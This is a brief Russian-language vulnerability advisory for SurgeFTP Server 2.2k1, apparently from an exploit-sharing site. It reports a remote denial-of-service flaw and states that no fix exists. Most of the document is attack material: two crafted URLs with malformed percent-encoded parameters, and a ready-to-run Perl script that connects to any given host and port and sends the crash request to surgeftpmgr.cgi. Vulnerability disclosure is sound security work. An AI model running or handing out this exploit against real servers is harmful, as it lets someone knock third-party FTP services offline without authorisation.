DoS против SurgeFTP Server

Описание: Уязвимость обнаружена в SurgeFTP Server. Удаленный пользователь может аварийно завершить работу FTP сервера.

Пример:

http://[server]:7021/cgi/surgeftpmgr.cgi?cmd=%%

http://[server]/cgi/?r34ct=%di e%

Пример/Эксплоит:

----------$r34ct-rainbow.pl ------
#!/usr/bin/perl
use IO::Socket;
printf "SurgeFtp 2.2k1\n\n";
if(@ARGV < 2) { die "\nUsage: host port \n"; }
$port = @ARGV[1];
$host = @ARGV[0];

$sock =new IO::Socket::INET(PeerAddr => $host,PeerPort => $port,Proto => "TCP");

print $sock "GET /cgi/surgeftpmgr.cgi?cmd=%% http/1.0\n\n";
while (<$sock>){print}

close ($sock);

print("\n\n");
exit;

---end-----

URL производителя: http://netwinsite.com/surgeftp/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.